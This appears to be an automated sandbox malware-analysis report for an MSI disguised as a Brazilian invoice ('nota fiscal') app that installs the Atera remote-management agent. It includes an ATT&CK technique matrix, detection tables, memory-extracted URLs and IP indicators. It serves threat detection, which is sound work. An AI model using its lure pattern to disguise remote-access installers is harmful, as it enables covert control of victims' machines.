Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 22 Windows Service | 111 Process Injection | 31 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 1 Timestomp | NTDS | 265 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 11 Service Execution | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 781 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 123 Masquerading | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 371 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 371 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 111 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph: ID 1584760, Sample: APLICATIVO-WINDOWS-NOTA-FIS..., Startdate: 06/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
APLICATIVO-WINDOWS-NOTA-FISCAL.msi | 18% | Virustotal | | Browse
APLICATIVO-WINDOWS-NOTA-FISCAL.msi | 24% | ReversingLabs | Win32.Trojan.Atera |

Source | Detection | Scanner | Label | Link
692c48.rbf (copy) | 26% | ReversingLabs | Win32.PUA.Atera |
692c48.rbf (copy) | 28% | Virustotal | | Browse
692c4a.rbf (copy) | 0% | ReversingLabs | |
692c4a.rbf (copy) | 0% | Virustotal | | Browse
692c4b.rbf (copy) | 0% | ReversingLabs | |
692c4b.rbf (copy) | 0% | Virustotal | | Browse
692c4c.rbf (copy) | 0% | ReversingLabs | |
692c4c.rbf (copy) | 0% | Virustotal | | Browse
692c4d.rbf (copy) | 0% | ReversingLabs | |
692c4e.rbf (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | 26% | ReversingLabs | Win32.PUA.Atera |
C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.Extensions.ManagedClient.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Abstractions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Binder.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.CommandLine.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.EnvironmentVariables.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Json.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.UserSecrets.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Abstractions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Physical.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.Abstractions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Abstractions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Configuration.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Console.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Debug.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventLog.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventSource.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.ConfigurationExtensions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Primitives.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Polly.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Hosting.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Sinks.File.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\System.Diagnostics.EventLog.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll | 0% | ReversingLabs | |
                                No Antivirus matches
                                No Antivirus matches
                                No Antivirus matches
                                No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                              https://josm.openstreetmap.de/reportAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/AdoptOpenJDK/openjdk11-binaries/releases/download/jdk-11.0.11%2B9_openj9-0.26.0/OAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk14jre/14.0.2.1200AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTAgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                                                                                      https://ps.atera.com/aAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://urn.to/r/sds_seeAgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmpfalse
                                                                                                                                          https://docs.aws.amazon.com/corretto/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziphAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://community.chocolatey.org/packages/adoptopenjdk11openj9jre/11.0.11.900AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://my.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://community.chocolatey.org/api/v2/package/Temurinjre/21.0.5.11AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://community.chocolatey.org/package/ReportAbuse/openjdk11jre/11.0.16.20220913AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      http://www.abit.com.tw/AgentPackageMonitoring.exe, 00000023.00000002.2121016000.000001F735BF2000.00000002.00000001.01000000.00000021.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E222D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://chocolatey.org/packages/adoptopenjdkjre):AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://community.chocolatey.org/api/v2/package/teamcity-preinstalledjre/2024.12.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://community.chocolatey.org/package/ReportAbuse/javaruntime-platformspecific/7.0.79.20161125AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/2.0/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://community.chocolatey.org/api/v2/package/adoptopenjdkopenj9jre/16.0.1.900AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://github.com/rgra/choco-packages/tree/master/server-jre8AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://community.chocolatey.org/api/v2/package/josm/19265.0.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://www.w3.oAteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.jetbrains.com/teamcity/documentation/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://community.chocolatey.org/package/ReportAbuse/openjdk8jre/8.342.07.20220913AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://mail.openjdk.java.net/mailman/listinfoAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://community.chocolatey.org/package/ReportAbuse/server-jre/8.0.192AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://ps.pndsn.com/v2/subscribAteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://github.com/chocolatey/chocolatey-coreteampackagesAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE542000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://agent-api.atera.com/Production/Agent/agentMonitoredDevices/52187e48-563c-468d-9785-3542f81fbAgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://adoptopenjdk.net/PAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.12%2B7/OpenJDK17U-jre_x86-AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000001F.00000002.2059219762.0000022F4E41F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4D8E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4E445000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://community.chocolatey.org/packages/server-jre10/10.0.1AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://github.com/nlog/NLog/wiki/Configuration-file#variablesAteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://community.chocolatey.org/packages/teamcity/2024.12.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://ps.pndsn.com/v2/subscribe/AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://asciidoctor.org/docs/user-manual/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://bell-sw.com/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://flywaydb.org/documentation/releaseNotesAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.5/AgentPackageMonitoring.ziAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://community.chocolatey.org/packages/openjdk8jre/8.342.07.20220913AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://github.com/proudcanadianeh/ChocoPackages/tree/master/jre8/masterAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://community.chocolatey.org/package/ReportAbuse/teamcity-preinstalledjre/2024.12.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://crl.defence.gov.au/pki0AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://agent-api.atera.com/Production/Agent/TraceAteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.zAteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/52187e48-563c-468d-9785AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.5%2B11/OpenJDK21U-jre_x64_AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://community.chocolatey.org/packages/TeamCity-PreinstalledJRE)AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://ps.atera.com/agentpackagesneAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9b97c88b-00f9-4ad4-acca-b3179ff49e5eAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://github.com/IdealChain/chocolatey-packages/tree/master/josmAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                        192.229.221.95
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15133EDGECASTUSfalse
                                                                                                                                                                                                                                        20.60.197.1
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584760
Start date and time: 2025-01-06 12:57:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 64
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: APLICATIVO-WINDOWS-NOTA-FISCAL.msi
Detection: MAL
Classification: mal100.troj.spyw.evad.winMSI@108/678@0/11
EGA Information:
• Successful, ratio: 14.3%
HCA Information:
• Successful, ratio: 61%
• Number of executed functions: 419
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .msi
• Exclude process from analysis (whitelisted): Conhost.exe, WMIADAP.exe, SIHClient.exe
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 3084 because it is empty
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7248 because it is empty
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7344 because it is empty
• Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 7568 because it is empty
• Execution Graph export aborted for target AteraAgent.exe, PID 3492 because it is empty
• Execution Graph export aborted for target AteraAgent.exe, PID 3652 because it is empty
• Execution Graph export aborted for target AteraAgent.exe, PID 8184 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7452 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7800 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7856 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7948 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
